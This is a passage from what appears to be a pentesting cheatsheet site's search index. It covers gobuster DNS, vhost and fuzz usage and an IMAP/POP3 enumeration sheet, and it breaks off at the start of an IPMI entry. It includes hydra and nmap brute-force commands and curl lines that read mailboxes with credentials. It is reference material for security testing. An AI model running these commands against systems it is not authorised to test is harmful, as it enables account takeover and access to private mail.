style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic DNS brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d \u0026lt;domain\u0026gt; -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With specific 
resolver\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d example.com -w wordlist.txt -r 8.8.8.8\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Show IP addresses\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d example.com -w wordlist.txt -i\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Wildcard override\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dns -d example.com -w wordlist.txt --wildcard\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"dns-flags\"\u003edns Flags\u003c/h3\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r \u0026lt;resolver\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom DNS resolver\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-i\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow IP addresses of found 
subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wildcard\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eForce scan even if wildcard DNS detected\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"vhost--virtual-host-discovery\"\u003evhost — Virtual Host Discovery\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic vhost scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Append domain to wordlist entries\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --append-domain \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --domain example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter out specific response length (removes 
default/fallback page)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --append-domain \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --exclude-length \u003cspan style=\"color:#ae81ff\"\u003e290\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# HTTPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k --append-domain\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"vhost-flags\"\u003evhost Flags\u003c/h3\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget URL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--append-domain\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAppend base domain to each word\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--domain \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBase domain to 
append\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--exclude-length \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExclude responses of this content length\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"fuzz--generic-fuzzing\"\u003efuzz — Generic Fuzzing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Fuzz a parameter value\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster fuzz -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;http://\u0026lt;ip\u0026gt;/page.php?id=FUZZ\u0026#34;\u003c/span\u003e -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Fuzz with status filter\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster fuzz -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;http://\u0026lt;ip\u0026gt;/FUZZ.php\u0026#34;\u003c/span\u003e -w wordlist.txt -b \u003cspan style=\"color:#ae81ff\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-wordlists\"\u003eRecommended Wordlists\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode 
class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Directories\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/common.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Files (with extensions)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Virtual hosts / subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"example-full-runs\"\u003eExample Full Runs\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Directory + file scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -u http://example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -x php,html,txt,bak,zip \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e -e -l \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -o gobuster_dir.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Virtual host discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster vhost \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -u http://example.com \u003cspan 
style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --append-domain \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --exclude-length \u003cspan style=\"color:#ae81ff\"\u003e290\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -o gobuster_vhost.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"gobuster"},{"content":"IMAP / POP3 Enumeration Cheatsheet Default Ports:\nIMAP: 143 (plain), 993 (SSL/TLS) POP3: 110 (plain), 995 (SSL/TLS) Banner Grabbing nc -nv \u0026lt;ip\u0026gt; 110 # POP3 nc -nv \u0026lt;ip\u0026gt; 143 # IMAP openssl s_client -connect \u0026lt;ip\u0026gt;:993 # IMAPS openssl s_client -connect \u0026lt;ip\u0026gt;:995 # POP3S openssl s_client -connect \u0026lt;ip\u0026gt;:143 -starttls imap # STARTTLS IMAP POP3 Commands (Manual) USER \u0026lt;username\u0026gt; PASS \u0026lt;password\u0026gt; STAT # Mailbox stats (message count, total size) LIST # List all messages with sizes LIST \u0026lt;n\u0026gt; # Info for message n RETR \u0026lt;n\u0026gt; # Retrieve (download) message n DELE \u0026lt;n\u0026gt; # Mark message n for deletion TOP \u0026lt;n\u0026gt; \u0026lt;lines\u0026gt; # Retrieve headers + first N lines of message n UIDL # Unique ID listing for all messages 
NOOP # Keep-alive RSET # Unmark any deletions QUIT # Commit deletes and disconnect IMAP Commands (Manual) a LOGIN \u0026lt;user\u0026gt; \u0026lt;pass\u0026gt; a CAPABILITY # Show server capabilities a LIST \u0026#34;\u0026#34; \u0026#34;*\u0026#34; # List all mailboxes a SELECT INBOX # Select inbox a STATUS INBOX (MESSAGES UNSEEN) # Inbox stats a FETCH 1:* (FLAGS) # List messages with flags a FETCH 1 (BODY[]) # Download full message 1 a FETCH 1 (BODY[HEADER]) # Headers only a FETCH 1 (BODY[TEXT]) # Body only a SEARCH ALL # Search all messages a SEARCH UNSEEN # Search unread messages a EXAMINE INBOX # Read-only select a LOGOUT Nmap Scripts nmap -p 110,143,993,995 --script imap-capabilities \u0026lt;ip\u0026gt; nmap -p 110,143,993,995 --script pop3-capabilities \u0026lt;ip\u0026gt; nmap -p 110 --script pop3-brute \u0026lt;ip\u0026gt; nmap -p 143 --script imap-brute \u0026lt;ip\u0026gt; nmap -p 993,995 --script imap-ntlm-info \u0026lt;ip\u0026gt; # Windows NTLM info leak Brute Force hydra -l \u0026lt;user\u0026gt; -P wordlist.txt imap://\u0026lt;ip\u0026gt; hydra -l \u0026lt;user\u0026gt; -P wordlist.txt pop3://\u0026lt;ip\u0026gt; hydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s 993 -S imap://\u0026lt;ip\u0026gt; # IMAPS hydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s 995 -S pop3://\u0026lt;ip\u0026gt; # POP3S curl Mail Access # List mailboxes curl -k \u0026#39;imaps://\u0026lt;ip\u0026gt;\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; # List INBOX contents curl -k \u0026#39;imaps://\u0026lt;ip\u0026gt;/INBOX\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; # Read specific message curl -k \u0026#39;imaps://\u0026lt;ip\u0026gt;/INBOX;MAILINDEX=1\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; # POP3 via curl curl -k \u0026#39;pop3s://\u0026lt;ip\u0026gt;\u0026#39; --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; curl -k \u0026#39;pop3s://\u0026lt;ip\u0026gt;/1\u0026#39; --user 
\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt; # Download message 1 ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/imap-pop3/","summary":"\u003ch1 id=\"imap--pop3-enumeration-cheatsheet\"\u003eIMAP / POP3 Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIMAP: 143 (plain), 993 (SSL/TLS)\u003c/li\u003e\n\u003cli\u003ePOP3: 110 (plain), 995 (SSL/TLS)\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner-grabbing\"\u003eBanner Grabbing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e110\u003c/span\u003e                              \u003cspan style=\"color:#75715e\"\u003e# POP3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e143\u003c/span\u003e                              \u003cspan style=\"color:#75715e\"\u003e# IMAP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:993           \u003cspan style=\"color:#75715e\"\u003e# IMAPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:995           \u003cspan style=\"color:#75715e\"\u003e# POP3S\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:143 -starttls imap   \u003cspan style=\"color:#75715e\"\u003e# STARTTLS 
IMAP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"pop3-commands-manual\"\u003ePOP3 Commands (Manual)\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eUSER \u0026lt;username\u0026gt;\nPASS \u0026lt;password\u0026gt;\nSTAT                    # Mailbox stats (message count, total size)\nLIST                    # List all messages with sizes\nLIST \u0026lt;n\u0026gt;                # Info for message n\nRETR \u0026lt;n\u0026gt;                # Retrieve (download) message n\nDELE \u0026lt;n\u0026gt;                # Mark message n for deletion\nTOP \u0026lt;n\u0026gt; \u0026lt;lines\u0026gt;         # Retrieve headers + first N lines of message n\nUIDL                    # Unique ID listing for all messages\nNOOP                    # Keep-alive\nRSET                    # Unmark any deletions\nQUIT                    # Commit deletes and disconnect\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"imap-commands-manual\"\u003eIMAP Commands (Manual)\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ea LOGIN \u0026lt;user\u0026gt; \u0026lt;pass\u0026gt;\na CAPABILITY                         # Show server capabilities\na LIST \u0026#34;\u0026#34; \u0026#34;*\u0026#34;                        # List all mailboxes\na SELECT INBOX                       # Select inbox\na STATUS INBOX (MESSAGES UNSEEN)     # Inbox stats\na FETCH 1:* (FLAGS)                  # List messages with flags\na FETCH 1 (BODY[])                   # Download full message 1\na FETCH 1 (BODY[HEADER])             # Headers only\na FETCH 1 (BODY[TEXT])               # Body only\na SEARCH ALL                         # Search all messages\na SEARCH UNSEEN                      # Search unread messages\na EXAMINE INBOX                      # Read-only select\na LOGOUT\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv 
class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 110,143,993,995 --script imap-capabilities \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 110,143,993,995 --script pop3-capabilities \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e110\u003c/span\u003e --script pop3-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e143\u003c/span\u003e --script imap-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 993,995 --script imap-ntlm-info \u0026lt;ip\u0026gt;    \u003cspan style=\"color:#75715e\"\u003e# Windows NTLM info leak\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt imap://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt pop3://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P 
wordlist.txt -s \u003cspan style=\"color:#ae81ff\"\u003e993\u003c/span\u003e -S imap://\u0026lt;ip\u0026gt;    \u003cspan style=\"color:#75715e\"\u003e# IMAPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s \u003cspan style=\"color:#ae81ff\"\u003e995\u003c/span\u003e -S pop3://\u0026lt;ip\u0026gt;    \u003cspan style=\"color:#75715e\"\u003e# POP3S\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"curl-mail-access\"\u003ecurl Mail Access\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List mailboxes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;imaps://\u0026lt;ip\u0026gt;\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List INBOX contents\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;imaps://\u0026lt;ip\u0026gt;/INBOX\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Read specific message\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;imaps://\u0026lt;ip\u0026gt;/INBOX;MAILINDEX=1\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# POP3 via curl\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;pop3s://\u0026lt;ip\u0026gt;\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -k \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;pop3s://\u0026lt;ip\u0026gt;/1\u0026#39;\u003c/span\u003e --user \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;    \u003cspan style=\"color:#75715e\"\u003e# Download message 1\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"IMAP POP3"},{"content":"IPMI Enumeration Cheatsheet Default Port: 623 (UDP)\nWhat is IPMI? Intelligent Platform Management Interface — out-of-band management for servers (iDRAC, iLO, BMC). 
